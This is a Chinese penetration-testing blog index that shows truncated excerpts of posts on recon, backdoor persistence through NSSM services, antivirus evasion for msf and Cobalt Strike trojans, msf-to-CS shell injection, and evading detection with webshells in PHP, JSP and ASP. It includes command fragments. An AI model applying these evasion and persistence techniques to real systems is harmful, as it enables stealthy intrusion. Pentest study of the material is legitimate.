信息收集总结 前言之前也总结过类似的信息收集相关的文章,但是每隔一段时间理解和手法都会有所不同,本文以hvv或授权但仅提供公司名称域名等情况下渗透测试的视角总结一些自己最近做信息收集的流程套路。 信息收集一、初始已知信息前言中提到的两种情况,一般初始信息只有公司名称、个别官网域名、靶标名称等信息,以此为起点进行信息收集。 二、搜寻根域名此步骤个人的经验是,面对大公司优先选择工信部备案查询,小公司用搜索引擎做起点 2021-05-31 信息收集 信息收集
使用nssm注册windows服务进行持久化 前言NSSM是一款注册Windows系统服务的工具。将应用程序注册为windows系统服务可以使其在系统停止、重启等情况仍可自动运行,可用于持久化后门。 下载http://www.nssm.cc/download 使用解压并在nssm.exe目录打开cmd 使用如下命令注册服务 1nssm install 服务名 填写木马路径和服务名,可以填写欺骗性较强的服务名 在服务里设置自动启动 重启 2021-05-27 bypass bypass
几款远控免杀工具使用总结 前言后渗透过程中往往要使用msf和cs等工具的木马,而默认生成的木马非常容易被杀毒软件检出,这个时候就需要对木马进行免杀,本文介绍几款免杀工具的使用。 虽然经过杀毒软件多年更新,这些工具免杀效果可能已经很一般了,但是相比于自己写编码器解码器来做免杀更为方便简单,没有任何编程积累也可以直接使用。 veil下载安装docker安装veil 1docker pull mattiasohlsson/vei 2021-05-25 bypass bypass
msf与cs互相转换 msf转cs在cs中配置新监听器,beacon_http即可,设置好监听ip和端口 使用msf payload_inject模块注入一个新的cs的shell 12345678backgrounduse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset lhost cs的ipset 2021-05-21 bypass bypass
命令执行写webshell总结 前言当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结从命令执行到webshell的流程化操作。 寻找web路径写webshell当然要写在web路径,第一步要做的就是快速寻找web路径 1.文件查找法一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 1234 2021-05-20 bypass bypass
内网信息收集总结 前言本文记录一些内网渗透的注意点,信息比较散乱,后续更新完善 本机信息查询常用信息1234567891011121314本机服务列表wmic service list brief本机进程列表Tasklist /v浏览器代理信息reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Se 2021-05-19 内网渗透 内网渗透
webshell免杀研究asp篇 原理向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构实现两步 数据的传递 执行所传递的数据 数据的传递request 执行所传递的数据Eval Execute ExecuteGlobal 免杀思路相比于php和jsp,由于asp语法结构较简单,很难在代码中完全不出现eval、execute等关键字,而request 2021-05-15 bypass bypass
webshell免杀研究jsp篇 原理向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构实现三步 数据的传递 执行所传递的数据 回显 数据传递1String x = request.getParameter("x"); 执行所传递的数据1234Class rt = Class.forName("java.lang.Ru 2021-05-12 bypass bypass
webshell免杀研究php篇 原理向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构实现两步 数据的传递 执行所传递的数据 数据的传递1.http请求中获取数据$_GET、$_POST、$_COOKIES、$_FILE…HTTP包中的任何位置都可以作为payload的传输媒介 2.从远程远程URL中获取数据file_get_contents 2021-05-11 bypass bypass
codimd在线协作文档部署 前言codimd是一款在线的markdown编辑器,用于实时在线协作编辑,非常适合需要多人合作记录重点信息的情况。 安装部署github地址 https://github.com/hackmdio/codimd 官方文档介绍了多种部署方式,其中docker部署最为快捷,本文介绍此场景下部署codimd的流程。 安装docker和docker-compose1.安装https协议、CA证书、dirm 2021-05-09 工具 工具